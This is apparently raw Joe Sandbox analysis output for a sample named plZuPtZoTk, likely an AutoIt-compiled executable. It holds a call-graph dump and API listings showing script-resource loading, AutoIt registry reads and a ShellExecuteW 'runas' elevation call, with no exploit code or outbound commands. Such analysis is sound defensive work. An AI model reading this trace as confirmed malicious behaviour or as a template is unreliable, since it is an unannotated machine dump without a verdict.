98047->98062 98058 9f8607 98048->98058 98049 9f8693 98064 9ef2d9 20 API calls _abort 98049->98064 98053 9ee64c 98053->98027 98053->98033 98054 9f869b 98065 9f27ec 26 API calls _abort 98054->98065 98056->98022 98057->98027 98066 9f8585 98058->98066 98060 9f862b 98060->98053 98061->98047 98062->98053 98063->98049 98064->98054 98065->98053 98067 9f8591 ___BuildCatchObject 98066->98067 98077 9f5147 EnterCriticalSection 98067->98077 98069 9f859f 98070 9f85c6 98069->98070 98071 9f85d1 98069->98071 98078 9f86ae 98070->98078 98093 9ef2d9 20 API calls _abort 98071->98093 98074 9f85cc 98094 9f85fb LeaveCriticalSection __wsopen_s 98074->98094 98076 9f85ee __fread_nolock 98076->98060 98077->98069 98095 9f53c4 98078->98095 98080 9f86c4 98108 9f5333 21 API calls 2 library calls 98080->98108 98082 9f86be 98082->98080 98084 9f53c4 
__wsopen_s 26 API calls 98082->98084 98092 9f86f6 98082->98092 98083 9f871c 98090 9f873e 98083->98090 98109 9ef2a3 20 API calls __dosmaperr 98083->98109 98086 9f86ed 98084->98086 98085 9f53c4 __wsopen_s 26 API calls 98087 9f8702 CloseHandle 98085->98087 98091 9f53c4 __wsopen_s 26 API calls 98086->98091 98087->98080 98088 9f870e GetLastError 98087->98088 98088->98080 98090->98074 98091->98092 98092->98080 98092->98085 98093->98074 98094->98076 98096 9f53d1 98095->98096 98098 9f53e6 98095->98098 98097 9ef2c6 __dosmaperr 20 API calls 98096->98097 98100 9f53d6 98097->98100 98099 9ef2c6 __dosmaperr 20 API calls 98098->98099 98101 9f540b 98098->98101 98102 9f5416 98099->98102 98103 9ef2d9 __dosmaperr 20 API calls 98100->98103 98101->98082 98104 9ef2d9 __dosmaperr 20 API calls 98102->98104 98105 9f53de 98103->98105 98106 9f541e 98104->98106 98105->98082 98107 9f27ec _abort 26 API calls 98106->98107 98107->98105 98108->98083 98109->98090 98111 9c33fe _wcslen 98110->98111 98112 a0311d 98111->98112 98113 9c3411 98111->98113 98115 9dfddb 22 API calls 98112->98115 98114 9ca587 22 API calls 98113->98114 98116 9c341e __fread_nolock 98114->98116 98117 a03127 98115->98117 98116->97622 98118 9dfe0b 22 API calls 98117->98118 98119 a03157 __fread_nolock 98118->98119 98120->97638 98122 a30f7e 98121->98122 98137 a31097 98121->98137 98123 a30f9e 98122->98123 98124 a30fcb 98122->98124 98126 a30fe2 98122->98126 98123->98124 98129 a30fb2 98123->98129 98125 9dfe0b 22 API calls 98124->98125 98130 a30fc0 __fread_nolock 98125->98130 98127 9dfe0b 22 API calls 98126->98127 98138 a30fff 98126->98138 98127->98138 98128 a31026 98132 9dfe0b 22 API calls 98128->98132 98131 9dfe0b 22 API calls 98129->98131 98134 9dfddb 22 API calls 98130->98134 98131->98130 98133 a3102c 98132->98133 98140 9df1d8 22 API calls 98133->98140 98134->98137 98136 a31038 98141 9df6c9 24 API calls 98136->98141 98137->97290 98138->98128 98138->98129 98138->98130 98140->98136 98141->98130 98143 a2d4d5 98142->98143 98144 a2dbdc 
GetFileAttributesW 98142->98144 98143->97065 98144->98143 98145 a2dbe8 FindFirstFileW 98144->98145 98145->98143 98146 a2dbf9 FindClose 98145->98146 98146->98143 98176 9c6270 98147->98176 98149 9c9fd2 98182 9ca4a1 22 API calls __fread_nolock 98149->98182 98151 9c9fec 98151->97303 98154 a0f699 98161 9dfddb 22 API calls 98154->98161 98155 9ca6c3 22 API calls 98169 9c9eb5 98155->98169 98156 a0f7c4 98187 a296e2 84 API calls __wsopen_s 98156->98187 98158 9ca405 98158->98151 98189 a296e2 84 API calls __wsopen_s 98158->98189 98163 a0f754 98161->98163 98162 a0f7d2 98188 9ca4a1 22 API calls __fread_nolock 98162->98188 98166 9dfe0b 22 API calls 98163->98166 98165 a0f7e8 98165->98151 98168 9ca12c __fread_nolock 98166->98168 98168->98156 98168->98158 98169->98149 98169->98154 98169->98155 98169->98156 98169->98158 98169->98168 98170 9ca587 22 API calls 98169->98170 98171 9caec9 22 API calls 98169->98171 98174 9ca4a1 22 API calls 98169->98174 98181 9c4573 41 API calls _wcslen 98169->98181 98184 9c48c8 23 API calls 98169->98184 98185 9c49bd 22 API calls __fread_nolock 98169->98185 98186 9ca673 22 API calls 98169->98186 98170->98169 98172 9ca0db CharUpperBuffW 98171->98172 98183 9ca673 22 API calls 98172->98183 98174->98169 98175->97307 98177 9dfe0b 22 API calls 98176->98177 98178 9c6295 98177->98178 98179 9dfddb 22 API calls 98178->98179 98180 9c62a3 98179->98180 98180->98169 98181->98169 98182->98151 98183->98169 98184->98169 98185->98169 98186->98169 98187->98162 98188->98165 98189->98151 98191 9cae01 98190->98191 98194 9cae1c ISource 98190->98194 98192 9caec9 22 API calls 98191->98192 98193 9cae09 CharUpperBuffW 98192->98193 98193->98194 98194->97087 98196 9cacae 98195->98196 98197 9cacd1 98196->98197 98225 a3359c 82 API calls __wsopen_s 98196->98225 98197->97099 98200 a0fadb 98199->98200 98201 9cad92 98199->98201 98202 9dfddb 22 API calls 98201->98202 98203 9cad99 98202->98203 98226 9cadcd 98203->98226 98206->97137 98207->97140 98208->97140 98209->97092 98210->97129 
98211->97110 98212->97129 98213->97129 98214->97099 98215->97099 98216->97099 98217->97099 98218->97099 98219->97099 98220->97121 98221->97129 98222->97126 98223->97136 98224->97129 98225->98197 98232 9caddd 98226->98232 98227 9cadb6 98227->97099 98228 9dfddb 22 API calls 98228->98232 98229 9ca961 22 API calls 98229->98232 98230 9ca8c7 22 API calls 98230->98232 98231 9cadcd 22 API calls 98231->98232 98232->98227 98232->98228 98232->98229 98232->98230 98232->98231 98233->97146 98234->97146 98235->97163 98236->97163 98237->97167 98238->97163 98239 9cf7bf 98240 9cfcb6 98239->98240 98241 9cf7d3 98239->98241 98276 9caceb 23 API calls ISource 98240->98276 98243 9cfcc2 98241->98243 98244 9dfddb 22 API calls 98241->98244 98277 9caceb 23 API calls ISource 98243->98277 98246 9cf7e5 98244->98246 98246->98243 98247 9cf83e 98246->98247 98248 9cfd3d 98246->98248 98250 9d1310 235 API calls 98247->98250 98254 9ced9d ISource 98247->98254 98278 a31155 22 API calls 98248->98278 98252 9cec76 ISource 98250->98252 98251 a14beb 98282 a3359c 82 API calls __wsopen_s 98251->98282 98252->98251 98252->98254 98255 9cfef7 98252->98255 98256 9dfddb 22 API calls 98252->98256 98258 9cf3ae ISource 98252->98258 98259 a14b0b 98252->98259 98260 9ca8c7 22 API calls 98252->98260 98261 a14600 98252->98261 98267 9cfbe3 98252->98267 98268 9ca961 22 API calls 98252->98268 98271 9e0242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 98252->98271 98272 9e01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 98252->98272 98273 9e00a3 29 API calls pre_c_initialization 98252->98273 98274 9d01e0 235 API calls 2 library calls 98252->98274 98275 9d06a0 41 API calls ISource 98252->98275 98255->98254 98264 9ca8c7 22 API calls 98255->98264 98256->98252 98258->98254 98279 a3359c 82 API calls __wsopen_s 98258->98279 98280 a3359c 82 API calls __wsopen_s 98259->98280 98260->98252 98261->98254 98265 9ca8c7 22 API calls 98261->98265 
98264->98254 98265->98254 98267->98254 98267->98258 98269 a14bdc 98267->98269 98268->98252 98281 a3359c 82 API calls __wsopen_s 98269->98281 98271->98252 98272->98252 98273->98252 98274->98252 98275->98252 98276->98243 98277->98248 98278->98254 98279->98254 98280->98254 98281->98251 98282->98254 98283 9c1098 98288 9c42de 98283->98288 98287 9c10a7 98289 9ca961 22 API calls 98288->98289 98290 9c42f5 GetVersionExW 98289->98290 98291 9c6b57 22 API calls 98290->98291 98292 9c4342 98291->98292 98293 9c93b2 22 API calls 98292->98293 98297 9c4378 98292->98297 98294 9c436c 98293->98294 98309 9c37a0 98294->98309 98295 9c441b GetCurrentProcess IsWow64Process 98298 9c4437 98295->98298 98297->98295 98299 a037df 98297->98299 98300 9c444f LoadLibraryA 98298->98300 98301 a03824 GetSystemInfo 98298->98301 98302 9c449c GetSystemInfo 98300->98302 98303 9c4460 GetProcAddress 98300->98303 98305 9c4476 98302->98305 98303->98302 98304 9c4470 GetNativeSystemInfo 98303->98304 98304->98305 98306 9c447a FreeLibrary 98305->98306 98307 9c109d 98305->98307 98306->98307 98308 9e00a3 29 API calls __onexit 98307->98308 98308->98287 98310 9c37ae 98309->98310 98311 9c93b2 22 API calls 98310->98311 98312 9c37c2 98311->98312 98312->98297 98313 a02ba5 98314 9c2b25 98313->98314 98315 a02baf 98313->98315 98341 9c2b83 7 API calls 98314->98341 98356 9c3a5a 98315->98356 98319 a02bb8 98321 9c9cb3 22 API calls 98319->98321 98323 a02bc6 98321->98323 98322 9c2b2f 98332 9c2b44 98322->98332 98345 9c3837 98322->98345 98324 a02bf5 98323->98324 98325 a02bce 98323->98325 98326 9c33c6 22 API calls 98324->98326 98328 9c33c6 22 API calls 98325->98328 98340 a02bf1 GetForegroundWindow ShellExecuteW 98326->98340 98329 a02bd9 98328->98329 98333 9c6350 22 API calls 98329->98333 98331 9c2b5f 98338 9c2b66 SetCurrentDirectoryW 98331->98338 98332->98331 98355 9c30f2 Shell_NotifyIconW ___scrt_fastfail 98332->98355 98336 a02be7 98333->98336 98334 a02c26 98334->98331 98337 9c33c6 22 API calls 98336->98337 98337->98340 98339 9c2b7a 
98338->98339 98340->98334 98363 9c2cd4 7 API calls 98341->98363 98343 9c2b2a 98344 9c2c63 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 98343->98344 98344->98322 98346 9c3862 ___scrt_fastfail 98345->98346 98364 9c4212 98346->98364 98349 9c38e8 98351 a03386 Shell_NotifyIconW 98349->98351 98352 9c3906 Shell_NotifyIconW 98349->98352 98368 9c3923 98352->98368 98354 9c391c 98354->98332 98355->98331 98391 a01f50 98356->98391 98359 9c9cb3 22 API calls 98360 9c3a8d 98359->98360 98393 9c3aa2 98360->98393 98362 9c3a97 98362->98319 98363->98343 98365 a035a4 98364->98365 98366 9c38b7 98364->98366 98365->98366 98367 a035ad DestroyIcon 98365->98367 98366->98349 98390 a2c874 42 API calls _strftime 98366->98390 98367->98366 98369 9c393f 98368->98369 98388 9c3a13 98368->98388 98370 9c6270 22 API calls 98369->98370 98371 9c394d 98370->98371 98372 a03393 LoadStringW 98371->98372 98373 9c395a 98371->98373 98375 a033ad 98372->98375 98374 9c6b57 22 API calls 98373->98374 98376 9c396f 98374->98376 98379 9ca8c7 22 API calls 98375->98379 98384 9c3994 ___scrt_fastfail 98375->98384 98377 9c397c 98376->98377 98378 a033c9 98376->98378 98377->98375 98380 9c3986 98377->98380 98381 9c6350 22 API calls 98378->98381 98379->98384 98382 9c6350 22 API calls 98380->98382 98383 a033d7 98381->98383 98382->98384 98383->98384 98385 9c33c6 22 API calls 98383->98385 98386 9c39f9 Shell_NotifyIconW 98384->98386 98387 a033f9 98385->98387 98386->98388 98389 9c33c6 22 API calls 98387->98389 98388->98354 98389->98384 98390->98349 98392 9c3a67 GetModuleFileNameW 98391->98392 98392->98359 98394 a01f50 __wsopen_s 98393->98394 98395 9c3aaf GetFullPathNameW 98394->98395 98396 9c3ace 98395->98396 98397 9c3ae9 98395->98397 98398 9c6b57 22 API calls 98396->98398 98399 9ca6c3 22 API calls 98397->98399 98400 9c3ada 98398->98400 98399->98400 98401 9c37a0 22 API calls 98400->98401 98402 9c3ae6 98401->98402 98402->98362 98403 9e03fb 98404 9e0407 ___BuildCatchObject 98403->98404 98432 9dfeb1 98404->98432 98406 9e040e 
98407 9e0561 98406->98407 98410 9e0438 98406->98410 98459 9e083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 98407->98459 98409 9e0568 98460 9e4e52 28 API calls _abort 98409->98460 98422 9e0477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 98410->98422 98443 9f247d 98410->98443 98412 9e056e 98461 9e4e04 28 API calls _abort 98412->98461 98416 9e0576 98417 9e0457 98419 9e04d8 98451 9e0959 98419->98451 98421 9e04de 98424 9e04f3 98421->98424 98422->98419 98455 9e4e1a 38 API calls 2 library calls 98422->98455 98456 9e0992 GetModuleHandleW 98424->98456 98426 9e04fa 98426->98409 98427 9e04fe 98426->98427 98428 9e0507 98427->98428 98457 9e4df5 28 API calls _abort 98427->98457 98458 9e0040 13 API calls 2 library calls 98428->98458 98431 9e050f 98431->98417 98433 9dfeba 98432->98433 98462 9e0698 IsProcessorFeaturePresent 98433->98462 98435 9dfec6 98463 9e2c94 10 API calls 3 library calls 98435->98463 98437 9dfecb 98442 9dfecf 98437->98442 98464 9f2317 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 98437->98464 98439 9dfed8 98440 9dfee6 98439->98440 98465 9e2cbd 8 API calls 3 library calls 98439->98465 98440->98406 98442->98406 98445 9f2494 98443->98445 98466 9e0a8c 98445->98466 98446 9e0451 98446->98417 98447 9f2421 98446->98447 98449 9f2450 98447->98449 98448 9e0a8c __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 98450 9f2479 98448->98450 98449->98448 98450->98422 98474 9e2340 98451->98474 98454 9e097f 98454->98421 98455->98419 98456->98426 98457->98428 98458->98431 98459->98409 98460->98412 98461->98416 98462->98435 98463->98437 98464->98439 98465->98442 98467 9e0a97 IsProcessorFeaturePresent 98466->98467 98468 9e0a95 98466->98468 98470 9e0c5d 98467->98470 98468->98446 98473 9e0c21 SetUnhandledExceptionFilter UnhandledExceptionFilter 

Control-flow Graph (graph image not reproduced; legend: Executed / Not Executed)
APIs
• GetVersionExW.KERNEL32(?), ref: 009C430D
  • Part of subcall function 009C6B57: _wcslen.LIBCMT ref: 009C6B6A
• GetCurrentProcess.KERNEL32(?,00A5CB64,00000000,?,?), ref: 009C4422
• IsWow64Process.KERNEL32(00000000,?,?), ref: 009C4429
• LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 009C4454
• GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 009C4466
• GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 009C4474
• FreeLibrary.KERNEL32(00000000,?,?), ref: 009C447B
• GetSystemInfo.KERNEL32(?,?,?), ref: 009C44A0
Memory Dump Source
• Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
• Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
Similarity
• API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
• String ID: GetNativeSystemInfo$kernel32.dll$|O
• API String ID: 3290436268-3101561225
• Opcode ID: d2a72cfbed6f9d14d1d21903f07271370642fa1c7e60aeb8772afc9451a8713e
• Instruction ID: a7d4be8bbca8dca57b9309f072e7228d715272c3326e8eb40ae4b410bfbbb0ae
• Opcode Fuzzy Hash: d2a72cfbed6f9d14d1d21903f07271370642fa1c7e60aeb8772afc9451a8713e
• Instruction Fuzzy Hash: 5FA1B466F0A3C6DFCB95C7E978806A77FF87B26300B14489ED4419BA71DA24450BDB22

Control-flow Graph (graph image not reproduced; legend: Executed / Not Executed)
APIs
• CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,009C50AA,?,?,00000000,00000000), ref: 009C42B2
• FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,009C50AA,?,?,00000000,00000000), ref: 009C42C9
• LoadResource.KERNEL32(?,00000000,?,?,009C50AA,?,?,00000000,00000000,?,?,?,?,?,?,009C4F20), ref: 00A035BE
• SizeofResource.KERNEL32(?,00000000,?,?,009C50AA,?,?,00000000,00000000,?,?,?,?,?,?,009C4F20), ref: 00A035D3
• LockResource.KERNEL32(009C50AA,?,?,009C50AA,?,?,00000000,00000000,?,?,?,?,?,?,009C4F20,?), ref: 00A035E6
Memory Dump Source
• Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
• Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
Similarity
• API ID: Resource$CreateFindGlobalLoadLockSizeofStream
• String ID: SCRIPT
• API String ID: 3051347437-3967369404
• Opcode ID: ff2143145e0d47e7ac1c75860672269faa2e69361ee972beb8c8972febe3365b
• Instruction ID: 4c1a8b181437c45f63cf26ed396b4920e7fdb6f5d6c858f8ae4ee4006c987952
• Opcode Fuzzy Hash: ff2143145e0d47e7ac1c75860672269faa2e69361ee972beb8c8972febe3365b
• Instruction Fuzzy Hash: 1F11AC70600300BFEB219BA5EC49F6B7BBDFBC5B62F20416DF812862A0DB71D800D621

Control-flow Graph (graph image not reproduced)

APIs
• SetCurrentDirectoryW.KERNEL32(?), ref: 009C2B6B
  • Part of subcall function 009C3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00A91418,?,009C2E7F,?,?,?,00000000), ref: 009C3A78
  • Part of subcall function 009C9CB3: _wcslen.LIBCMT ref: 009C9CBD
• GetForegroundWindow.USER32(runas,?,?,?,?,?,00A82224), ref: 00A02C10
• ShellExecuteW.SHELL32(00000000,?,?,00A82224), ref: 00A02C17
Memory Dump Source
• Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
• Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
Similarity
• API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
• String ID: runas
• API String ID: 448630720-4000483414
• Opcode ID: 19a67f483e82c91d6ca31621f76a79749bbe40bc8b0e65c9f96a2cb26763f22c
• Instruction ID: 9c533f37d38da4fd23e9cb970d3b50e5db09e89bbfc565c7d8836f1a930c0773
• Opcode Fuzzy Hash: 19a67f483e82c91d6ca31621f76a79749bbe40bc8b0e65c9f96a2cb26763f22c
• Instruction Fuzzy Hash: 2F11B471A083456AC714FF70E855FBEBBA4ABD6310F44842DF082520A2DF20894AC713
                                                                      APIs
                                                                      • lstrlenW.KERNEL32(?,00A05222), ref: 00A2DBCE
                                                                      • GetFileAttributesW.KERNELBASE(?), ref: 00A2DBDD
                                                                      • FindFirstFileW.KERNELBASE(?,?), ref: 00A2DBEE
                                                                      • FindClose.KERNEL32(00000000), ref: 00A2DBFA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                      • String ID:
                                                                      • API String ID: 2695905019-0
                                                                      • Opcode ID: 7f4bd370aad110f1053809aa16aede7ef7b10ddc4b8b5111761c91639fdbd277
                                                                      • Instruction ID: bc931b951e21ddb5f2d829da2ecda9c42bc82696dba2f77b6af81fca00cfc9a1
                                                                      • Opcode Fuzzy Hash: 7f4bd370aad110f1053809aa16aede7ef7b10ddc4b8b5111761c91639fdbd277
                                                                      • Instruction Fuzzy Hash: 84F0A030810B206BC220BBBCAC0D8AE376CAE01336B104712F836D24E1FBB05956C696
                                                                      APIs
                                                                      • GetInputState.USER32 ref: 009CD807
                                                                      • timeGetTime.WINMM ref: 009CDA07
                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 009CDB28
                                                                      • TranslateMessage.USER32(?), ref: 009CDB7B
                                                                      • DispatchMessageW.USER32(?), ref: 009CDB89
                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 009CDB9F
                                                                      • Sleep.KERNEL32(0000000A), ref: 009CDBB1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                                      • String ID:
                                                                      • API String ID: 2189390790-0
                                                                      • Opcode ID: 4d46511678abac43e3746ab94af5012f1c1ba0443a3c550dccd44d30a1d3a57f
                                                                      • Instruction ID: 2ff8e69507bb01f7135346101a1455a69dad54af49fc6834cc46cd269a111c88
                                                                      • Opcode Fuzzy Hash: 4d46511678abac43e3746ab94af5012f1c1ba0443a3c550dccd44d30a1d3a57f
                                                                      • Instruction Fuzzy Hash: AA420330A09341EFD728CF24C885FAAB7E5BF85304F14892EE59687291D774E895CB93

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetSysColorBrush.USER32(0000000F), ref: 009C2D07
                                                                      • RegisterClassExW.USER32(00000030), ref: 009C2D31
                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 009C2D42
                                                                      • InitCommonControlsEx.COMCTL32(?), ref: 009C2D5F
                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 009C2D6F
                                                                      • LoadIconW.USER32(000000A9), ref: 009C2D85
                                                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 009C2D94
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                      • API String ID: 2914291525-1005189915
                                                                      • Opcode ID: 28e8af5f8401d5d756560afd03ddc77ac7a352efc39e26336d46f93dfe80f958
                                                                      • Instruction ID: 03080dfd5ba79f26170511d9389803a6b9aaf6c618df5b30eafcb27fd074d97c
                                                                      • Opcode Fuzzy Hash: 28e8af5f8401d5d756560afd03ddc77ac7a352efc39e26336d46f93dfe80f958
                                                                      • Instruction Fuzzy Hash: 4521B2B5A01319AFDB00DFE4EC49B9DBBB4FB08B15F10811AF911A62A4DBB14545CF91

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 00A0039A: CreateFileW.KERNELBASE(00000000,00000000,?,00A00704,?,?,00000000,?,00A00704,00000000,0000000C), ref: 00A003B7
                                                                      • GetLastError.KERNEL32 ref: 00A0076F
                                                                      • __dosmaperr.LIBCMT ref: 00A00776
                                                                      • GetFileType.KERNELBASE(00000000), ref: 00A00782
                                                                      • GetLastError.KERNEL32 ref: 00A0078C
                                                                      • __dosmaperr.LIBCMT ref: 00A00795
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00A007B5
                                                                      • CloseHandle.KERNEL32(?), ref: 00A008FF
                                                                      • GetLastError.KERNEL32 ref: 00A00931
                                                                      • __dosmaperr.LIBCMT ref: 00A00938
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                      • String ID: H
                                                                      • API String ID: 4237864984-2852464175
                                                                      • Opcode ID: eb78b18d240d2fcff98fff7a36e27a6acf7643858501b22ca381d61826df7c77
                                                                      • Instruction ID: b2ac5b674ec2303699e7b87b71a110627bf8a0834f5a138eaa30ed7a405af2f6
                                                                      • Opcode Fuzzy Hash: eb78b18d240d2fcff98fff7a36e27a6acf7643858501b22ca381d61826df7c77
                                                                      • Instruction Fuzzy Hash: 1DA10432A046488FDF19EFA8E851FAE7BA0AB46320F14415AF8159F3D1DB359D13CB91

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 009C3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00A91418,?,009C2E7F,?,?,?,00000000), ref: 009C3A78
                                                                        • Part of subcall function 009C3357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 009C3379
                                                                      • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 009C356A
                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00A0318D
                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00A031CE
                                                                      • RegCloseKey.ADVAPI32(?), ref: 00A03210
                                                                      • _wcslen.LIBCMT ref: 00A03277
                                                                      • _wcslen.LIBCMT ref: 00A03286
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                      • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                      • API String ID: 98802146-2727554177
